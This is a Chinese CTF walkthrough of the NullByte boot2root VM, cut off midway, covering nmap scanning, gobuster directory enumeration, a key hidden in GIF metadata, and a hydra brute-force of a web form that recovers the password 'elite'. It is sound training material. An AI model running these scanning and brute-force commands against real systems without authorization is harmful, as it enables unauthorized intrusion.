NullByte详细打靶全过程

2025-04-11
dfer
22
网络网络安全 CSDN

主机描述

代号： NB0x01

下载： ly0n.me/nullbyte/NullByte.ova.zip

对象：转到 /root/proof.txt 并按照说明进行作。

级别：基础到中级。

描述： Boot2root，盒子将从 dhcp 获取 IP，与 virtualbox&vmware 适配良好。

提示：利用你的横向思维技能，也许你需要写一些代码。

一、主机发现

kali和靶机开启后，先查看本机IP地址所在网段，然后再使用nmap扫描网段中的主机进行主机发现

──(kali㉿kali)-[~/桌面]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.118.129  netmask 255.255.255.0  broadcast 192.168.118.255
        inet6 fe80::20c:29ff:fe0a:619a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:0a:61:9a  txqueuelen 1000  (Ethernet)
        RX packets 250029  bytes 130423271 (123.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 253052  bytes 50922991 (48.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sP 192.168.118.0/24                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 17:40 CST
Nmap scan report for 192.168.118.129
Host is up (0.00062s latency).
Nmap scan report for 192.168.118.130
Host is up (0.00057s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.91 seconds

已知kali的IP是192.168.118.129，那另一个IP192.168.118.130就是靶机的地址了

二、信息收集

1.开放端口收集使用命令：sudo nmap --min-rate 10000 -p- -oA /nmapscan/potrs 192.168.118.130 扫描靶机的端口参数介绍

参数	介绍
--min-rate 10000	以最低10000的速率扫描目标主机，使用10000的原因是加快搜集速度
-p-	扫描所有端口
-oA	以三种格式的输出文件：普通文本（.nmap）、XML（.xml）和 grepable 格式（.gnmap）把扫描到的端口信息写入到ports文件中，方便后面查看

┌──(kali㉿kali)-[~/桌面/nmapscan]
└─$ sudo nmap -sT  -p-  192.168.118.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 15:24 CST
Nmap scan report for 192.168.118.130
Host is up (0.00082s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.39 seconds

2.收集服务详细信息获取到靶机开放的端口后就可以进行精确扫描了

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p80,111,777,50635 -oA nmapscan/detail 192.168.118.130
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 20:52 CST
Nmap scan report for 192.168.118.130
Host is up (0.00035s latency).

PORT      STATE  SERVICE VERSION
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
111/tcp   open   rpcbind 2-4 (RPC #100000)
777/tcp   open   ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

初步分析靶机上运行的服务：

端口	状态	服务	描述
80	open	http	Apache中间件版本是2.4.10
111	open	rpc	rpcbind是一个用于远程过程调用（RPC）的端口映射服务，主要功能是将 RPC 程序号（Program Number）动态绑定到网络端口（如 TCP/UDP 端口）。它是许多依赖 RPC 协议的服务（如 NFS、NIS）正常运行的基础组件。
777	open	SSH	OpenSSH 6.7p1版本
50635	close	未知	无

根据nmap提供判断信息可知靶机linux的内核版本应该是3.2~4.9

再使用命令：sudo nmap -sT -sV -sC -O -p80,111,777,48572 -oA nmapscan/detail 192.168.118.130来进行更精确深入的扫描

参数	介绍
-sT	使用TCP协议扫描
-sV	获取服务版本
-sC	使用默认脚本扫描能够增强扫描的深度和广度
-O	探测靶机操作系统版本
-p80,111,777,48572	探测目标端口信息
-oA	将扫描内容保存，方便后面查看

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -sC -O -p80,111,777,48572 -oA nmapscan/detail 192.168.118.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 20:54 CST
Nmap scan report for 192.168.118.130
Host is up (0.00036s latency).

PORT      STATE  SERVICE VERSION
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37297/udp   status
|   100024  1          42651/tcp6  status
|   100024  1          44330/tcp   status
|_  100024  1          57451/udp6  status
777/tcp   open   ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
50635/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:49:E6:C8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

通过80端口的信息可以确定靶机的操作系统是Dibian，111端口获取到了rpc的一些信息，777是SSH服务，50635段口也是个rpc

3.使用udp协议进行扫描，并将结果保存到udp文件中

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sU -p80,111,777,50635 -oA nmapscan/udp 192.168.118.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 15:39 CST
Nmap scan report for 192.168.118.130
Host is up (0.00026s latency).

PORT      STATE  SERVICE
80/udp    closed http
111/udp   open   rpcbind
777/udp   closed multiling-http
50635/udp closed unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)

参数	介绍
-sU	使用UDP协议进行扫描

仅有111宽口的udp是打开的 4.使用nmap默认漏洞脚本进行扫描

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -script=vuln -p80,111,777,50635 -oA vuln 192.168.118.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 15:42 CST
Nmap scan report for 192.168.118.130
Host is up (0.00033s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|_  /uploads/: Potentially interesting folder
111/tcp   open  rpcbind
777/tcp   open  multiling-http
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.26 seconds

三、寻找漏洞

1.查看靶机80端口的web服务，表面发现只有一个眼睛的图片和一句话“If you search for the laws of harmony.you will find knowledge.(如果你正在寻找平衡的法则，你将会发现知识)”

2.很有哲理的一句话哈，然后再查看页面的源代码有个标题“Null Byte 00 - level 1”，有一个main.gif图片，先给它下载下来，等会看看里面有没有隐写重要信息,后面那句话是我们上面翻译的那句话

3.将main.gif下载下来

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://192.168.118.130/main.gif
--2025-03-12 21:22:10--  http://192.168.118.130/main.gif
正在连接 192.168.118.130:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：16647 (16K) [image/gif]
正在保存至: “main.gif.1”

main.gif.1      100%[======>]  16.26K  --.-KB/s  用时 0.002s  

2025-03-12 21:22:10 (9.78 MB/s) - 已保存 “main.gif.1” [16647/16647])

4.使用file目录查看其文件类型，是正常的图片文件

┌──(kali㉿kali)-[~/桌面]
└─$ file main.gif
main.gif: GIF image data, version 89a, 235 x 302

5.再用exiftool来查看main.gif的详细信息，在main.gif中的Comment属性中发现了一串字符，把这个字符串记下来“kzMb5nVYJw”

┌──(kali㉿kali)-[~/桌面]
└─$ exiftool main.gif           
ExifTool Version Number         : 12.76
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:02 00:39:30+08:00
File Access Date/Time           : 2025:03:12 21:21:27+08:00
File Inode Change Date/Time     : 2025:03:12 21:21:26+08:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

6.既然80端口没什么其他线索了，我们使用nmap的漏洞扫描脚本去看看能不能发现漏洞。扫出来不少有用的东西，发现了两个目录==/phpmyadmin/ 和 /uploads/==，nmap提示靶机存在被Dos攻击的风险，这个就没必要了，直接忽略掉

┌──(kali㉿kali)-[~/桌面/nmapscan]
└─$ cat vuln.nmap       

Nmap 7.94SVN scan initiated Wed Mar 12 15:42:55 2025 as: nmap -script=vuln -p80,111,777,50635 -oA vuln 192.168.118.130
Nmap scan report for 192.168.118.130
Host is up (0.00033s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|_  /uploads/: Potentially interesting folder
111/tcp   open  rpcbind
777/tcp   open  multiling-http
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)


Nmap done at Wed Mar 12 15:48:16 2025 -- 1 IP address (1 host up) scanned in 321.26 seconds

7.先不着急去看这两个目录，再用gobuester扫一下靶机的目录，康康有没有其他惊喜。哦，有发现一个新的目录/javascript/


┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.118.130 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
[sudo] kali 的密码：
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.118.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 320] [--> http://192.168.118.130/uploads/]
/javascript           (Status: 301) [Size: 323] [--> http://192.168.118.130/javascript/]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.118.130/phpmyadmin/]
/server-status        (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

8.去看看这三个目录里，有什么吧。 /phpmyadmin/里是phpMyAmin的登陆页面，我们用之前获取的奇怪字符串来看看能不能登进去。

9.好吧并不可以，使用bp爆破admin的密码也没爆出来，那就去看看其他页面吧

10.shift！javascript目录没权限访问，换下一个目录吧

11.额，uploads目录也不行，去ssh碰碰运气吧，看看这串神秘字符能不能该我们带来惊喜

12.尝试使用字符串kzMb5nVYJw去登陆靶机的root用户。又不可以……


┌──(kali㉿kali)-[~]
└─$ sudo ssh root@192.168.118.130 -p 777 
root@192.168.118.130's password: 
Permission denied, please try again.
root@192.168.118.130's password:

13.到这里我思考良久，又想到了，神秘字符串有可能是目录呢？一试便知。ohhhhhh!果然是目录，是一个输入框。

14.看一下源代码有什么东西，有一句提示“this form isn’t connected to mysql, password ain’t that complex（这个表单没有连接到 MySQL，密码并不复杂。）”。
15.既然他说不复杂，那去试几个简单的密码瞧瞧。返回提示“invalid key（无效的密钥）”。

16.试了很多次后，依然没有成果，直接使用hydra爆破吧。也是成功的爆破出了密码：elite

┌──(kali㉿kali)-[~]
└─$ sudo hydra 192.168.118.130 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l litemao -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or